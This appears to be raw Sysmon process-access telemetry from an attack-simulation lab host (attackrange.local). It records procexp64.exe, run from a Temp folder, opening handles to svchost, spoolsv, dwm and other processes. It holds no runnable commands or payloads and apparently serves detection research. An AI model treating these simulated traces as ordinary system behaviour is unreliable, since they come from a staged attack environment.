15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.377{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 